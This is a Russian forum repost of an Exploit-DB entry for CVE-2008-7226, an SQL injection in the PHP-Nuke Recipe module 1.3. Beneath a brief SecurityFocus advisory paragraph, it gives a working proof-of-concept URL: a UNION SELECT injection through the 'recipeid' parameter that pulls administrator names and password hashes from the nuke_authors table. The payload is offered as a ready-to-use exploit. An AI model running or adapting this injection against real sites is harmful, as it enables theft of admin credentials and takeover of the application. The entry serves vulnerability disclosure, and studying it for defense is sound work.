Exploit PHP-Nuke Recipe Module 1.3 - 'recipeid' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
31287
Проверка EDB
  1. Пройдено
Автор
S@BUN
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-7226
Дата публикации
2008-02-23
Код:
source: https://www.securityfocus.com/bid/27955/info

The Recipe module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Recipe 1.3 is vulnerable; other versions may also be affected.

http://www.example.com/modules.php?name=Recipe&recipeid=-000/**/union+select+0,pwd,0,0x3a,0x3a,0,aid,aid,pwd,0,0,0,0,0x3a,0,0/**/from/**/nuke_authors/*
 
Источник
www.exploit-db.com

Похожие темы